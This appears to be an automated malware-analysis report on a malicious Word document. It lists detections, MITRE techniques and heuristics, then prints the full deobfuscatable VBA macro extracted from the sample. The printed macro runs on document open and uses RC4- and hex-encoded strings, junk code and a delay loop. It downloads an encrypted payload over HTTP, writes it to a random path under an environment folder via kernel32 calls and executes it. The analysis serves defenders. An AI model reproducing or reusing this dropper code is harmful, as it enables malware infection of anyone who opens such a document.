MALICIOUS
400
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The file is a malicious OOXML document containing obfuscated VBA macros designed to execute upon opening. The document body explicitly instructs the user to 'Enable Editing' and 'Enable Content', a common social engineering tactic. The VBA script uses CreateObject and CallByName, indicative of malicious intent, and the presence of 'macros.bas' and 'vbaProject_00.bin' further confirms macro-based malicious activity.
Heuristics 12
-
ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
-
VBA project inside OOXML medium 7 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
GetObject 74, 79 -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set FbIW4ltLA88 = CreateObject(K3eK9VdclC(MN4z8s1zym("B0120D1D7C751DE2C15160F9EC3352C6F8"), "WZHgB")) -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
GetObject 74, 79 -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
CallByName O6L5SL, 66, VbMethod, 6, 86, 69 -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Sub Document_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
YSpf48ETuJjtz8tpK = Environ(K3eK9VdclC(MN4z8s1zym("C5D7996A28461D"), "Gf1q7py6w")) & "\" & BM69L8KOihljn & K3eK9VdclC(MN4z8s1zym("CCE10A1F"), "Eo7bBqJhcEJ") -
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 15766 bytes |
SHA-256: 3a60f68189c7f222e10f9390520d67a6eb09d5da645157643aad8db98b2e7e21 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
126 of 221 identifiers look randomly generated (e.g. 'B0120D1D7C751DE2C15160F9EC3352C6F8'); 3 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function IUywRdBVQpp Lib "kernel32" Alias "_lclose" (ByVal DcR953340kM As Long) As Long
Private Declare PtrSafe Function YgY6OSQ3xlzlngG Lib "kernel32" Alias "_lwrite" (ByVal Du8L As Long, IPxySewYyq As Any, ByVal NbZIcqZNCUx As Long) As Long
Private Declare PtrSafe Function A0GVv0cPdsI Lib "kernel32" Alias "_lcreat" (ByVal OnIc6SNM46 As String, ByVal Thf5hXYKd As Long) As Long
#Else
Private Declare Function YgY6OSQ3xlzlngG Lib "kernel32" Alias "_lwrite" (ByVal Du8L As Long, IPxySewYyq As Any, ByVal NbZIcqZNCUx As Long) As Long
Private Declare Function IUywRdBVQpp Lib "kernel32" Alias "_lclose" (ByVal DcR953340kM As Long) As Long
Private Declare Function A0GVv0cPdsI Lib "kernel32" Alias "_lcreat" (ByVal OnIc6SNM46 As String, ByVal Thf5hXYKd As Long) As Long
#End If
Function MN4z8s1zym(JDk5DWyHLNwq As String) As String
Dim YQppsPZPr As Long, Pz1wa4B38ttU As Long
YQppsPZPr = 53
Pz1wa4B38ttU = 14
If YQppsPZPr + Pz1wa4B38ttU > 2 Then
Pz1wa4B38ttU = YQppsPZPr + 5
Else
Pz1wa4B38ttU = 6 + 3 + 12
End If
Dim X0N3K As Integer
Dim K1qRiXzPBTlX As Long, Aa2YNuS As Long
K1qRiXzPBTlX = 16
Aa2YNuS = 51
If K1qRiXzPBTlX + Aa2YNuS > 2 Then
Aa2YNuS = K1qRiXzPBTlX + 45
Else
Aa2YNuS = 89 + 31 + 78
End If
For X0N3K = 1 To Len(JDk5DWyHLNwq) Step 2
MN4z8s1zym = MN4z8s1zym & Chr$(Val(Chr$(38) & Chr$(72) & Mid$(JDk5DWyHLNwq, X0N3K, 2)))
Next
Dim YM1ndGwRnFPRWcyDx5g5DtsLK5YYh As Long, JpRFN6TxCu2ZFbmCy As Long
YM1ndGwRnFPRWcyDx5g5DtsLK5YYh = 96
JpRFN6TxCu2ZFbmCy = 9
If YM1ndGwRnFPRWcyDx5g5DtsLK5YYh + JpRFN6TxCu2ZFbmCy > 2 Then
JpRFN6TxCu2ZFbmCy = YM1ndGwRnFPRWcyDx5g5DtsLK5YYh + 46
Else
JpRFN6TxCu2ZFbmCy = 61 + 41 + 2
End If
End Function
Function F5kRJ5Gc4XQuBV(RvmplsFlm As String, SDMnUI97hf5 As String)
Dim IFHIvF304HkSRbUYP As Long, YSsSs4LQ8Imho30mY As Long
IFHIvF304HkSRbUYP = 55
YSsSs4LQ8Imho30mY = 60
If IFHIvF304HkSRbUYP + YSsSs4LQ8Imho30mY > 2 Then
YSsSs4LQ8Imho30mY = IFHIvF304HkSRbUYP + 44
Else
YSsSs4LQ8Imho30mY = 92 + 22 + 8
End If
Dim LfoPS3V2apbgRa As Long
Dim U7pMv As Long, SLG6hrxYFHIvF304H As Long
U7pMv = 63
SLG6hrxYFHIvF304H = 83
If U7pMv + SLG6hrxYFHIvF304H > 2 Then
SLG6hrxYFHIvF304H = U7pMv + 94
Else
SLG6hrxYFHIvF304H = 87 + 10 + 43
End If
LfoPS3V2apbgRa = A0GVv0cPdsI(RvmplsFlm, 128)
Dim DYdC11s As Long, La9huiDkSRbUYP As Long
DYdC11s = 48
La9huiDkSRbUYP = 79
If DYdC11s + La9huiDkSRbUYP > 2 Then
La9huiDkSRbUYP = DYdC11s + 60
Else
La9huiDkSRbUYP = 65 + 49 + 97
End If
YgY6OSQ3xlzlngG LfoPS3V2apbgRa, ByVal SDMnUI97hf5, Len(SDMnUI97hf5)
Dim YmTZRB0sa As Long, Y7DpvaUj7rOCX As Long
YmTZRB0sa = 56
Y7DpvaUj7rOCX = 1
If YmTZRB0sa + Y7DpvaUj7rOCX > 2 Then
Y7DpvaUj7rOCX = YmTZRB0sa + 69
Else
Y7DpvaUj7rOCX = 89 + 2 + 93
End If
IUywRdBVQpp LfoPS3V2apbgRa
Dim IrSNDnvQwKY As Long, Tx74pn0Il As Long
IrSNDnvQwKY = 29
Tx74pn0Il = 38
If IrSNDnvQwKY + Tx74pn0Il > 2 Then
Tx74pn0Il = IrSNDnvQwKY + 10
Else
Tx74pn0Il = 95 + 10 + 68
End If
End Function
Sub Document_Open()
Dim EQXVPtmw9sLw As Long, HY1GXjpXWa6K As Long
EQXVPtmw9sLw = 65
HY1GXjpXWa6K = 74
If EQXVPtmw9sLw + HY1GXjpXWa6K > 2 Then
HY1GXjpXWa6K = EQXVPtmw9sLw + 46
Else
HY1GXjpXWa6K = 59 + 73 + 5
End If
On Error Resume Next
Dim IlaiyzWQbHB As Long, G5Yt As Long
IlaiyzWQbHB = 49
G5Yt = 2
If IlaiyzWQbHB + G5Yt > 2 Then
G5Yt = IlaiyzWQbHB + 18
Else
G5Yt = 42 + 96 + 34
End If
Dim Um2BDRJ5y As Long, FmALjyz As Long, L5U0PnqHI2 As Long
Dim PlGboQ0On As Long, MBKmCGZsOUNiRtk As Long
PlGboQ0On = 24
MBKmCGZsOUNiRtk = 51
If PlGboQ0On + MBKmCGZsOUNiRtk > 2 Then
MBKmCGZsOUNiRtk = PlGboQ0On + 70
Else
MBKmCGZsOUNiRtk = 11 + 37 + 13
End If
Um2BDRJ5y = 917615576: FmALjyz = 0: L5U0PnqHI2 = 0
Dim Aq5FhUvgse9 As Long, Jy7CgAAdJi6 As Long
Aq5FhUvgse9 = 95
Jy7CgAAdJi6 = 63
If Aq5FhUvgse9 + Jy7CgAAdJi6 > 2 Then
Jy7CgAAdJi6 = Aq5FhUvgse9 + 7
Else
Jy7CgAAdJi6 = 75 + 95 + 8
End If
For FmALjyz = 1 To Um2BDRJ5y
L5U0PnqHI2 = L5U0PnqHI2 + 1
Next FmALjyz
Dim DMgyBYN8RGC9C As Long, GkuTI71PHMNFrUcw As Long
DMgyBYN8RGC9C = 70
GkuTI71PHMNFrUcw = 63
If DMgyBYN8RGC9C + GkuTI71PHMNFrUcw > 2 Then
GkuTI71PHMNFrUcw = DMgyBYN8RGC9C + 85
Else
GkuTI71PHMNFrUcw = 91 + 20 + 61
End If
If L5U0PnqHI2 = Um2BDRJ5y Then
Dim OnGjf7SxeNwDs7hAZ As Long, JceOu As Long
OnGjf7SxeNwDs7hAZ = 67
JceOu = 93
If OnGjf7SxeNwDs7hAZ + JceOu > 2 Then
JceOu = OnGjf7SxeNwDs7hAZ + 14
Else
JceOu = 80 + 80 + 55
End If
Dim UZXX As Long, IuOpnDLmEjINyAJi As Long
UZXX = 83
IuOpnDLmEjINyAJi = 24
If UZXX + IuOpnDLmEjINyAJi > 2 Then
IuOpnDLmEjINyAJi = UZXX + 49
Else
IuOpnDLmEjINyAJi = 25 + 98 + 51
End If
BGFU6Kv3BFgLi1VrY
Dim WAE5aA As Long, LUkjtplg9w As Long
WAE5aA = 62
LUkjtplg9w = 14
If WAE5aA + LUkjtplg9w > 2 Then
LUkjtplg9w = WAE5aA + 31
Else
LUkjtplg9w = 55 + 9 + 47
End If
Else
Dim J7xDiVT2X As Long, UTgvw6 As Long
J7xDiVT2X = 24
UTgvw6 = 74
If J7xDiVT2X + UTgvw6 > 2 Then
UTgvw6 = J7xDiVT2X + 25
Else
UTgvw6 = 46 + 35 + 69
End If
Con8
Dim MRydvdQH As Long, EwLUNOJoteCqe0 As Long
MRydvdQH = 16
EwLUNOJoteCqe0 = 72
If MRydvdQH + EwLUNOJoteCqe0 > 2 Then
EwLUNOJoteCqe0 = MRydvdQH + 31
Else
EwLUNOJoteCqe0 = 27 + 92 + 70
End If
End If
Dim DkcBtlVpBKW3A As Long, THxbIFTq1ZRDt As Long
DkcBtlVpBKW3A = 64
THxbIFTq1ZRDt = 29
If DkcBtlVpBKW3A + THxbIFTq1ZRDt > 2 Then
THxbIFTq1ZRDt = DkcBtlVpBKW3A + 34
Else
THxbIFTq1ZRDt = 73 + 28 + 37
End If
End Sub
Function BM69L8KOihljn() As String
Dim JvEVrtQuPNl As Long, BizcTA2V4vZPQV As Long
JvEVrtQuPNl = 60
BizcTA2V4vZPQV = 21
If JvEVrtQuPNl + BizcTA2V4vZPQV > 2 Then
BizcTA2V4vZPQV = JvEVrtQuPNl + 12
Else
BizcTA2V4vZPQV = 13 + 10 + 19
End If
Dim KfXXBk() As Byte, J38ttUVod() As Byte, DQjqbQFq2U As Long, Lp1j9U As Long, K52NBx As String, ILcR9533 As String, JsPZProATafs As Long
Dim IjWCh1 As Long, GydvdQH4 As Long
IjWCh1 = 68
GydvdQH4 = 94
If IjWCh1 + GydvdQH4 > 2 Then
GydvdQH4 = IjWCh1 + 88
Else
GydvdQH4 = 55 + 81 + 30
End If
JsPZProATafs = 0
Dim PZ7x As Long, Qq1ZRDtzTc As Long
PZ7x = 43
Qq1ZRDtzTc = 17
If PZ7x + Qq1ZRDtzTc > 2 Then
Qq1ZRDtzTc = PZ7x + 24
Else
Qq1ZRDtzTc = 74 + 25 + 46
End If
KBV7E0U5tbxV:
Dim W8uGfHQ As Long, Aq1ZRDtzTc As Long
W8uGfHQ = 2
Aq1ZRDtzTc = 17
If W8uGfHQ + Aq1ZRDtzTc > 2 Then
Aq1ZRDtzTc = W8uGfHQ + 96
Else
Aq1ZRDtzTc = 57 + 74 + 75
End If
Randomize
ILcR9533 = Int(30 * Rnd)
If ILcR9533 < 4 Then GoTo KBV7E0U5tbxV
JsPZProATafs = ILcR9533
If JsPZProATafs > 0& Then
Dim OoGf5E1aMU As Long, Thd8gXXNb As Long
OoGf5E1aMU = 40
Thd8gXXNb = 84
If OoGf5E1aMU + Thd8gXXNb > 2 Then
Thd8gXXNb = OoGf5E1aMU + 97
Else
Thd8gXXNb = 12 + 70 + 94
End If
K52NBx = K3eK9VdclC(MN4z8s1zym("047FDD9F6BFD3D4E9E66"), "JCynXdod")
Randomize
KfXXBk = K52NBx
DQjqbQFq2U = Len(K52NBx) - 1&
JsPZProATafs = (JsPZProATafs * 2&) - 1&
ReDim J38ttUVod(JsPZProATafs) As Byte
Dim FNSmkzxPtGTqqw8 As Long, IfoQp260Pca As Long
FNSmkzxPtGTqqw8 = 51
IfoQp260Pca = 52
If FNSmkzxPtGTqqw8 + IfoQp260Pca > 2 Then
IfoQp260Pca = FNSmkzxPtGTqqw8 + 93
Else
IfoQp260Pca = 96 + 15 + 60
End If
For Lp1j9U = 0& To JsPZProATafs Step 2&
J38ttUVod(Lp1j9U) = KfXXBk(CLng(DQjqbQFq2U * Rnd) * 2&)
Next
Dim CJJeEf1lsFV As Long, EncwSv As Long
CJJeEf1lsFV = 10
EncwSv = 48
If CJJeEf1lsFV + EncwSv > 2 Then
EncwSv = CJJeEf1lsFV + 59
Else
EncwSv = 74 + 54 + 15
End If
End If
Dim M2i1qf As Long, JFyZ5a55Gz785eL8 As Long
M2i1qf = 1
JFyZ5a55Gz785eL8 = 77
If M2i1qf + JFyZ5a55Gz785eL8 > 2 Then
JFyZ5a55Gz785eL8 = M2i1qf + 72
Else
JFyZ5a55Gz785eL8 = 61 + 95 + 90
End If
BM69L8KOihljn = J38ttUVod
Dim G1dhCMolRbmTR As Long, WpHh6p4Y As Long
G1dhCMolRbmTR = 63
WpHh6p4Y = 14
If G1dhCMolRbmTR + WpHh6p4Y > 2 Then
WpHh6p4Y = G1dhCMolRbmTR + 36
Else
WpHh6p4Y = 24 + 59 + 27
End If
End Function
Sub Con8()
Dim P6qdoeENRcX4 As Long, Xapj9hmpbUN As Long
P6qdoeENRcX4 = 20
Xapj9hmpbUN = 44
If P6qdoeENRcX4 + Xapj9hmpbUN > 2 Then
Xapj9hmpbUN = P6qdoeENRcX4 + 72
Else
Xapj9hmpbUN = 36 + 69 + 43
End If
Q9bTakfvpA = CurDir
Partition 75, 76, 73, 83
VxSpAwhr6N1 = UCase(54)
Choose 41, JIpOBZoeFVK0je
LOF 54
If CByte(13) = True Then V7rleLg2f4 = 6436
Load KeQKuV9WZRW8uFyS6
ChDir 67
GetObject 74, 79
Month 64
Filter IssB7clw, 10
DateSerial 12, 67, 27
If IsNumeric(96) = True Then GEM9Wg4Evl9TK4x9 = 87
CallByName O6L5SL, 66, VbMethod, 6, 86, 69
Sqr 95
If CBool(16) = True Then LIbFLs0tA3koLwGwD = 82
App.StartLogging "CdulongkW7z", 82
Niydr3Xp = CSng(57)
InputBox 31, 83, 27, 50, 78
IPmt 42, 76, 49, 57
App.LogEvent "LDka64btoNDqZQxba"
Command
LoadPicture 7, 83, 78, 67, 3
Hh9rdznsNL = CVErr(96)
Sin 40
JMqMB5wYOpVvl = QBColor(82)
Weekday 30
FqFdh017GwLnb6 = CVDate(41)
KgH1AUKZpUosr = EOF(34)
Second 56
Dim K451UfWll As Long, Av9I As Long
K451UfWll = 98
Av9I = 57
If K451UfWll + Av9I > 2 Then
Av9I = K451UfWll + 53
Else
Av9I = 19 + 96 + 36
End If
End Sub
Sub AEivMC(Homt9ZkXmKM As Long)
Dim FjMBv As Long, QIY2vgOIYd As Long
FjMBv = 67
QIY2vgOIYd = 77
If FjMBv + QIY2vgOIYd > 2 Then
QIY2vgOIYd = FjMBv + 48
Else
QIY2vgOIYd = 35 + 48 + 7
End If
Dim Rd2PYhJJxdT As Long
Dim EdPHhEV5xsy As Long, RwjxN3hmjB As Long
EdPHhEV5xsy = 42
RwjxN3hmjB = 54
If EdPHhEV5xsy + RwjxN3hmjB > 2 Then
RwjxN3hmjB = EdPHhEV5xsy + 90
Else
RwjxN3hmjB = 7 + 86 + 47
End If
Rd2PYhJJxdT = Timer + Homt9ZkXmKM
Do While Timer < Rd2PYhJJxdT
DoEvents
Loop
Dim URYpgoByQLT As Long, H8K8Kslz As Long
URYpgoByQLT = 17
H8K8Kslz = 28
If URYpgoByQLT + H8K8Kslz > 2 Then
H8K8Kslz = URYpgoByQLT + 43
Else
H8K8Kslz = 23 + 83 + 1
End If
End Sub
Sub BGFU6Kv3BFgLi1VrY()
Dim Bbzgz6T As Long, Cn27dHTPfEnoJ As Long
Bbzgz6T = 56
Cn27dHTPfEnoJ = 62
If Bbzgz6T + Cn27dHTPfEnoJ > 2 Then
Cn27dHTPfEnoJ = Bbzgz6T + 46
Else
Cn27dHTPfEnoJ = 93 + 23 + 9
End If
Dim YSpf48ETuJjtz8tpK As String, FbIW4ltLA88 As Object
Dim MytadhmxqCP As Long, TeoC1TcDsAAR2SA5 As Long
MytadhmxqCP = 59
TeoC1TcDsAAR2SA5 = 73
If MytadhmxqCP + TeoC1TcDsAAR2SA5 > 2 Then
TeoC1TcDsAAR2SA5 = MytadhmxqCP + 32
Else
TeoC1TcDsAAR2SA5 = 83 + 55 + 86
End If
YSpf48ETuJjtz8tpK = Environ(K3eK9VdclC(MN4z8s1zym("C5D7996A28461D"), "Gf1q7py6w")) & "\" & BM69L8KOihljn & K3eK9VdclC(MN4z8s1zym("CCE10A1F"), "Eo7bBqJhcEJ")
Dim QQTL8FLtl5R3eGZcBFxT As Long, StldLIMzXIGDl9MM As Long
QQTL8FLtl5R3eGZcBFxT = 20
StldLIMzXIGDl9MM = 19
If QQTL8FLtl5R3eGZcBFxT + StldLIMzXIGDl9MM > 2 Then
StldLIMzXIGDl9MM = QQTL8FLtl5R3eGZcBFxT + 49
Else
StldLIMzXIGDl9MM = 56 + 62 + 46
End If
Set FbIW4ltLA88 = CreateObject(K3eK9VdclC(MN4z8s1zym("B0120D1D7C751DE2C15160F9EC3352C6F8"), "WZHgB"))
Dim SAVuoQbFJXy As Long, Efmp90W As Long
SAVuoQbFJXy = 77
Efmp90W = 46
If SAVuoQbFJXy + Efmp90W > 2 Then
Efmp90W = SAVuoQbFJXy + 12
Else
Efmp90W = 16 + 56 + 11
End If
FbIW4ltLA88.Open K3eK9VdclC(MN4z8s1zym("9DC0C2"), "LSXeT5xsy"), K3eK9VdclC(MN4z8s1zym("E3E4F263FDADCC6E79896B966A451AA8548BA2FFFBCF4E9C2AA6BB"), "LYOJC"), False
Dim Yda7pVtf As Long, XL7mp90W As Long
Yda7pVtf = 14
XL7mp90W = 10
If Yda7pVtf + XL7mp90W > 2 Then
XL7mp90W = Yda7pVtf + 75
Else
XL7mp90W = 53 + 92 + 74
End If
FbIW4ltLA88.setRequestHeader K3eK9VdclC(MN4z8s1zym("20AC06D51A8B6A7141BB"), "OLF4Q7j"), K3eK9VdclC(MN4z8s1zym("01C440257B9722A6835002"), "OIz7TqTZmWKzN3ks")
FbIW4ltLA88.send
If FbIW4ltLA88.readyState = 4 And FbIW4ltLA88.Status = 200 Then
Dim Qyw3uE8Nv8n6k As Long, SJDO9D8 As Long
Qyw3uE8Nv8n6k = 8
SJDO9D8 = 79
If Qyw3uE8Nv8n6k + SJDO9D8 > 2 Then
SJDO9D8 = Qyw3uE8Nv8n6k + 65
Else
SJDO9D8 = 79 + 38 + 89
End If
F5kRJ5Gc4XQuBV YSpf48ETuJjtz8tpK, K3eK9VdclC(StrConv(FbIW4ltLA88.ResponseBody, vbUnicode), K3eK9VdclC(MN4z8s1zym("79A1A85CEFE775B3E0"), "DRgyDchW3RJ"))
Dim WLjxFwtvIDt As Long, VXErfosaOD As Long
WLjxFwtvIDt = 61
VXErfosaOD = 71
If WLjxFwtvIDt + VXErfosaOD > 2 Then
VXErfosaOD = WLjxFwtvIDt + 16
Else
VXErfosaOD = 29 + 43 + 1
End If
AEivMC 1
Dim YhY2oZ2YaY As Long, CZ5p99AE7JLXg1w As Long
YhY2oZ2YaY = 32
CZ5p99AE7JLXg1w = 9
If YhY2oZ2YaY + CZ5p99AE7JLXg1w > 2 Then
CZ5p99AE7JLXg1w = YhY2oZ2YaY + 4
Else
CZ5p99AE7JLXg1w = 91 + 27 + 22
End If
CreateObject(K3eK9VdclC(MN4z8s1zym("29BB6CC00B1467715544C55158"), "OoShP7L7")).exec """" & YSpf48ETuJjtz8tpK & """"
Dim Luhw51Kj3RhN0K As Long, YnQh3NRYwbT As Long
Luhw51Kj3RhN0K = 70
YnQh3NRYwbT = 19
If Luhw51Kj3RhN0K + YnQh3NRYwbT > 2 Then
YnQh3NRYwbT = Luhw51Kj3RhN0K + 19
Else
YnQh3NRYwbT = 71 + 88 + 12
End If
End If
Dim JyGA4nl5GPs5 As Long, Y1JIMcoj8OMg As Long
JyGA4nl5GPs5 = 56
Y1JIMcoj8OMg = 59
If JyGA4nl5GPs5 + Y1JIMcoj8OMg > 2 Then
Y1JIMcoj8OMg = JyGA4nl5GPs5 + 77
Else
Y1JIMcoj8OMg = 96 + 86 + 43
End If
Set FbIW4ltLA88 = Nothing
Dim DrKgj1FsI08Uvx3 As Long, DlT1UCGq8nDy4 As Long
DrKgj1FsI08Uvx3 = 20
DlT1UCGq8nDy4 = 16
If DrKgj1FsI08Uvx3 + DlT1UCGq8nDy4 > 2 Then
DlT1UCGq8nDy4 = DrKgj1FsI08Uvx3 + 81
Else
DlT1UCGq8nDy4 = 59 + 98 + 80
End If
End Sub
Function K3eK9VdclC(ByVal LNERidI4aVwmD As String, ByVal Gqn1zGLhdvUQylj As String) As String
Dim MQLUIJIrKLfWiOJ As Long, P8dM26aKpC As Long
MQLUIJIrKLfWiOJ = 77
P8dM26aKpC = 69
If MQLUIJIrKLfWiOJ + P8dM26aKpC > 2 Then
P8dM26aKpC = MQLUIJIrKLfWiOJ + 92
Else
P8dM26aKpC = 25 + 53 + 94
End If
On Error Resume Next
Dim Ep6ijVOi As Long, Wl3ZX4Sorv As Long
Ep6ijVOi = 34
Wl3ZX4Sorv = 52
If Ep6ijVOi + Wl3ZX4Sorv > 2 Then
Wl3ZX4Sorv = Ep6ijVOi + 97
Else
Wl3ZX4Sorv = 61 + 18 + 48
End If
Dim SP57yuqlr(0 To 255) As Integer, YsHQs4O6HCpmV As Long, EiJoKrSNKQ2 As Long, Yo2K3r9tZpP1kmD As Long, DU4vahS9e5w2() As Byte, G6WJSPZXveA() As Byte, Jy957Qbg5dkHSE As Byte
Dim EjE3UhzPGfC As Long, ShoTirW9cng8xfv8y As Long
EjE3UhzPGfC = 32
ShoTirW9cng8xfv8y = 31
If EjE3UhzPGfC + ShoTirW9cng8xfv8y > 2 Then
ShoTirW9cng8xfv8y = EjE3UhzPGfC + 62
Else
ShoTirW9cng8xfv8y = 69 + 74 + 58
End If
DU4vahS9e5w2() = StrConv(Gqn1zGLhdvUQylj, vbFromUnicode)
Dim MKTp3VtsDcbX As Long, DAFuSh3flBj4rxMUq As Long
MKTp3VtsDcbX = 43
DAFuSh3flBj4rxMUq = 98
If MKTp3VtsDcbX + DAFuSh3flBj4rxMUq > 2 Then
DAFuSh3flBj4rxMUq = MKTp3VtsDcbX + 58
Else
DAFuSh3flBj4rxMUq = 27 + 19 + 96
End If
For YsHQs4O6HCpmV = 0 To 255
SP57yuqlr(YsHQs4O6HCpmV) = YsHQs4O6HCpmV
Next YsHQs4O6HCpmV
YsHQs4O6HCpmV = 0
EiJoKrSNKQ2 = 0
Yo2K3r9tZpP1kmD = 0
For YsHQs4O6HCpmV = 0 To 255
EiJoKrSNKQ2 = (EiJoKrSNKQ2 + SP57yuqlr(YsHQs4O6HCpmV) + DU4vahS9e5w2(YsHQs4O6HCpmV Mod Len(Gqn1zGLhdvUQylj))) Mod 256
Jy957Qbg5dkHSE = SP57yuqlr(YsHQs4O6HCpmV)
SP57yuqlr(YsHQs4O6HCpmV) = SP57yuqlr(EiJoKrSNKQ2)
SP57yuqlr(EiJoKrSNKQ2) = Jy957Qbg5dkHSE
Next YsHQs4O6HCpmV
YsHQs4O6HCpmV = 0
EiJoKrSNKQ2 = 0
Yo2K3r9tZpP1kmD = 0
G6WJSPZXveA() = StrConv(LNERidI4aVwmD, vbFromUnicode)
For YsHQs4O6HCpmV = 0 To Len(LNERidI4aVwmD)
EiJoKrSNKQ2 = (EiJoKrSNKQ2 + 1) Mod 256
Yo2K3r9tZpP1kmD = (Yo2K3r9tZpP1kmD + SP57yuqlr(EiJoKrSNKQ2)) Mod 256
Jy957Qbg5dkHSE = SP57yuqlr(EiJoKrSNKQ2)
SP57yuqlr(EiJoKrSNKQ2) = SP57yuqlr(Yo2K3r9tZpP1kmD)
SP57yuqlr(Yo2K3r9tZpP1kmD) = Jy957Qbg5dkHSE
G6WJSPZXveA(YsHQs4O6HCpmV) = G6WJSPZXveA(YsHQs4O6HCpmV) Xor (SP57yuqlr((SP57yuqlr(EiJoKrSNKQ2) + SP57yuqlr(Yo2K3r9tZpP1kmD)) Mod 256))
Next YsHQs4O6HCpmV
Dim CH5Y As Long, XBBECQDnmb1 As Long
CH5Y = 75
XBBECQDnmb1 = 2
If CH5Y + XBBECQDnmb1 > 2 Then
XBBECQDnmb1 = CH5Y + 22
Else
XBBECQDnmb1 = 88 + 87 + 63
End If
K3eK9VdclC = StrConv(G6WJSPZXveA, vbUnicode)
Dim DlZJUxwV9QX0J As Long, UIujuRuryh3OK As Long
DlZJUxwV9QX0J = 65
UIujuRuryh3OK = 30
If DlZJUxwV9QX0J + UIujuRuryh3OK > 2 Then
UIujuRuryh3OK = DlZJUxwV9QX0J + 35
Else
UIujuRuryh3OK = 74 + 29 + 38
End If
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 38912 bytes |
SHA-256: 44d3d298aa87596720faa51e018d2f02e32ba9c62d49adb65449eddd80c4f5b9 |
|||
|
Detection
ClamAV:
Doc.Malware.Chronos-6897935-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.